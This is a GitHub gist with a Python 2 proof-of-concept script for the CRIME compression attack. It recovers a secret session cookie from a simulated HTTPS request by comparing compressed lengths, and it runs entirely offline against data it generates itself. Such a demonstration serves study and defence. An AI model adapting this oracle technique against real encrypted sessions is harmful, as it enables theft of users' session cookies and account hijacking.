-
-
Save kostyll/15a563a6ab39d68fe3b4 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This is supposedly what CRIME by Juliano Rizzo and Thai Duong will do | |
# Algorithm by Thomas Pornin, coding by xorninja, improved by @kkotowicz | |
# http://security.blogoverflow.com/2012/09/how-can-you-protect-yourself-from-crime-beasts-successor/ | |
import string | |
import zlib | |
import sys | |
import random | |
charset = string.letters + string.digits + "%/+=" | |
COOKIE = ''.join(random.choice(charset) for x in range(30)) | |
HEADERS = ("POST / HTTP/1.1\r\n" | |
"Host: thebankserver.com\r\n" | |
"Connection: keep-alive\r\n" | |
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n" | |
"Accept: */*\r\n" | |
"Referer: https://thebankserver.com/\r\n" | |
"Cookie: secret=" + COOKIE + "\r\n" | |
"Accept-Encoding: gzip,deflate,sdch\r\n" | |
"Accept-Language: en-US,en;q=0.8\r\n" | |
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n" | |
"\r\n") | |
BODY = ("\r\nCookie: secret=" | |
) | |
BODY_SUFFIX=("\r\n" | |
"Accept-Encoding: gzip,deflate,sdch\r\n" | |
"Accept-Language: en-US,en;q=0.8\r\n" | |
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n" | |
"\r\n") | |
cookie = "" | |
def compress(data): | |
c = zlib.compressobj() | |
return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH) | |
def findnext(b,bs,charset): | |
original_length = len(compress(HEADERS + b + bs)) | |
lengths = [] | |
for c in charset: | |
length = len(compress(HEADERS + | |
b + | |
c + | |
bs)) | |
lengths.append((c, length)) | |
min_length = min(_[1] for _ in lengths) | |
possible_chars = [_[0] for _ in filter(lambda _: _[1] == min_length, lengths)] | |
return possible_chars | |
def exit(): | |
print "Original cookie: %s" % COOKIE | |
print "Leaked cookie : %s" % cookie | |
sys.exit(1) | |
def forward(): | |
global cookie | |
while len(cookie) < len(COOKIE): | |
chop = 1 | |
possible_chars = findnext(BODY + cookie, "", charset) | |
body_tmp = BODY | |
orig = possible_chars | |
while not len(possible_chars) == 1: | |
if len(body_tmp) < chop: | |
#print "stuck at", possible_chars | |
return False | |
body_tmp = body_tmp[chop:] | |
possible_chars = findnext(body_tmp + cookie, "", orig) | |
cookie = cookie + possible_chars[0] | |
return True | |
while BODY.find("\r\n") >= 0: | |
if not forward(): | |
cookie = cookie[:-1] | |
if len(cookie) >= len(COOKIE): | |
exit() | |
print "reducing body" | |
BODY = BODY[BODY.find("\r\n") + 2:] | |
exit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment